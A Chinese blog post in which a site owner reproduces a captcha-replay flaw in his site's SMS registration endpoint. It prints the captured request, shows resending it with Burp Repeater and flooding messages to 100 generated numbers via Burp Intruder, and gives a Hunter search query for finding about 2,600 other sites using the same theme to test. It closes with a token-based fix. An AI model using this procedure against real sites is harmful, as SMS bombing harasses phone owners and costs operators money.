记猪头网站短信利用漏洞
作者:FancyPig | 发布时间: | 更新时间:
杂谈
深夜醒来,接收到了阿里的短信提醒
想想我这个日活5-6k人的小站也被黑产盯上了?我记得在短信注册的时候是有滑动验证的
难道说?这里面有漏洞?
漏洞复现
data-postsbox="{"id":11474,"title":"【零基础学渗透】工具篇——BurpSuite","author":"Sec-Labs","author_id":10015,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/03/20220313155529975.png","cover_video":"","views":9399,"comment_count":663,"category":"cybersecurity","is_forum_post":false}">{"id":11474,"title":"【零基础学渗透】工具篇——BurpSuite","author":"Sec-Labs","author_id":10015,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/03/20220313155529975.png","cover_video":"","views":9399,"comment_count":663,"category":"cybersecurity","is_forum_post":false}
我们打开burpsuite,启用拦截功能,可以看到intercept is on
这里打开一个注册页面,输入手机号然后点击获取验证码
然后,会出现图像滑块验证,我们进行滑动,然后抓包
我们可以看到payload如下,主要的参数即为email_phone=,后面接上手机号
name=&email_phone=你的手机号&captch=&captcha_type=email_phone&password2=&action=signup_captcha&slidercaptcha%5Bspliced%5D=true&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Bverified%5D=true那么,我们来测试下,这个验证码是否能被重复利用,我们右键,选择Send to Repeater
然后看看能不能修改号码重新发包,我这里改成另一个手机号,点击send发送
居然发送成功了
然后,我看了下手机,确实收到了
那么,那些做黑产的又是如何通过我们这个漏洞制造的短信轰炸呢?
他们有很多代理池,通过频繁请求我们刚才的接口就可以完成所谓的短信轰炸……
这里,我们也简单来讲解一下,其实通过burpsuite里的暴破模式也可以间接实现
我们把刚才的包发送到入侵模块,点击Send to Intruder
我们先点击clear,清除没用的变量
然后,我们勾选手机号作为变量,点击Add $,他会在你的手机号前后都加上$
然后我们在payload中,导入任意手机号,你可以自行生成一些随机的手机号
我们随便生成了100个
然后点Load导入
然后点击start attack,短信就会被疯狂刷了,一条四分钱,猪猪直接流泪
然后就看到短信喀喀喀的被刷了……
实录
由于猪猪的主题用的是子比主题,很多同行站长也表示,实在是太难受了
看看视频里的就很惨哦
如何发现其他有此接口的同类站长
我们可以参考之前的文章
data-postsbox="{"id":10011,"title":"免费网络空间测绘平台 奇安信Hunter——鹰图平台","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/02/20220219014721759.png","cover_video":"","views":20317,"comment_count":6,"category":"knowledge","is_forum_post":false}">{"id":10011,"title":"免费网络空间测绘平台 奇安信Hunter——鹰图平台","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/02/20220219014721759.png","cover_video":"","views":20317,"comment_count":6,"category":"knowledge","is_forum_post":false}
这里使用的奇安信的hunter平台,我们先获取icon
然后上传
点击确定,就可以搜索了
hunter这里只爆了5个资产
看样子图标不太行,我们再换一种搜索方式
web.body="子比"
看起来这个就很多了,可以看到有2600多条资产
然后,你就可以去测试了,看看这里面的网站是不是也存在我这样的漏洞呢?
如何修复漏洞
修复漏洞这里建议采用token验证方式,需要服务端生成token然后每次请求短信接口都需要做token校验,token如果不正确则无法发送短信!单纯的验证IP几乎是无效的策略!